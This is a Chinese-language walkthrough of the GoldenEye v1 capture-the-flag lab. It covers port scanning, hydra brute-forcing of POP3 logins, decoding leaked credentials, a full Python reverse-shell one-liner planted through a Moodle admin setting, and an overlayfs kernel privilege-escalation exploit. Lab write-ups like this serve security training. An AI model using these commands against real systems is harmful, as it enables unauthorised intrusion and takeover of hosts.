信息收集
探测主机IP
kali:192.168.30.142
靶机:192.168.30.143
探测端口:
nmap -p- 192.168.30.143 -Pn -sV
web渗透
发现有web端口,访问网页
发现要求/sev-home/登录,弹出一个登录框。
暂时没有发现什么信息,打开源代码,发现有两个js文件,第一个没有用,第二个有一段注释,根据经验,他像是一些引导提示
通过翻译知道,这是一段留言,提到两个人,Boris,Natalya,还有一段编码,通过解密可以得到。 InvincibleHack3r
登录成功
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port。//请记住,由于隐匿性安全性非常有效,因此我们已将 pop3 服务配置为在非常高的非默认端口上运行
这里提到了一个pop3端口,上面的端口刚好有一个pop3端口:55007
在terminal.js中提示说,可以会被爆破出密码,所以我们尝试爆破。爆破的用户名就是boris,natalya
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3
这样我们就得到两个用户名和密码。
boris\secret1!
natalya\bird
登录到boris用户有三封信件:
分别是来自root 和natalya的邮件,她可以破解Boris的密码。
之后我们看natalya的信息
在natalya的第二件信中找到信息
用户名: xenia
密码: RCP90rulez!
域名: severnaya-station.com
URL: severnaya-station.com/gnocertdir
信息提示要将severnaya-station.com域名加入 /etc/hosts
发现了Doak一个新用户的信件,使用hydra爆破
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3
nc登录
dr_doak
4England!
登录发现一个s3cret.txt文件
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
指向了一个/dir007key/for-007.jpg 文件
看不出什么信息,下载图片分析
eFdpbnRlcjE5OTV4IQ==
解密:
xWinter1995x!
这个是管理员账号密码
登录之后修改设置
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.30.143",4444));os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
反弹到了shell
提权:
查看linux内核版本
下载相应的exp:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit
开启一个http服务
上传至靶机
由于靶机上没有gcc,所以使用clang代替
sed -i 's/gcc/clang/g' 37292.c
然后clang编译源代码,执行a.out
提权成功
得到flag
总结:
首先通过端口扫描,在80端口进行渗透,使用hydra工具对pop3端口账号进行密码爆破,得到关键信息,进入web管理后台,在检查拼写的路径处写入反弹shell,建立blog,反弹到shell,然后利用linux版本漏洞,上传靶机exp,编译执行获得shell。
还可以使用msf getshell,需要将后台spell engine改为PSpellShell,msf底层代码使用的是pspellshell。
参考链接:GlodenEye-v1黄金眼靶场复现 - FreeBuf网络安全行业门户
版权归原作者 TZXLzz 所有, 如有侵权,请联系我们删除。